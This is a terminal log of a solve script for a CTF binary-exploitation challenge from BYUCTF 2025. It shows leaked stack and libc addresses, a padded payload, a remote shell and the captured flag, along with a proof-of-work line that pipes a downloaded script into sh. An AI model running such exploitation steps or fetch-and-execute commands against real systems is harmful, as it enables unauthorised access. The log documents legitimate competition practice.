mito@mito-virtual-machine:~/CTF/BYUCTF_2025/Pwn_Goat$ python3 solve.py r
[+] Opening connection to goat.chal.cyberjousting.com on port 1349: Done
b'curl -sSfL https://pwn.red/pow | sh -s s.AAAu4A==.QhW66cYZ3EK+cn8Ald5lvg==\n'
[+] Starting local process '/bin/sh': pid 4950
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
stack_leak = 0x7ffdea9036f0
fgets_addr = 0x7fbb53060b20
libc_base  = 0x7fbb52fdb000
[*] Switching to interactive mode
Are you sure? You said:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       p
sh: 1: Welcome: not found
sh: 2: Lets see if youre: not found
sh: 3: Syntax error: Unterminated quoted string
$ id
sh: 1: Are: not found
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)
$ ls -l
sh: 1: Welcome: not found
sh: 2: Lets see if youre: not found
sh: 3: Syntax error: Unterminated quoted string
$ cat flag.txt
sh: 1: Are: not found
byuctf{n0w_y0u're_the_g0at!}$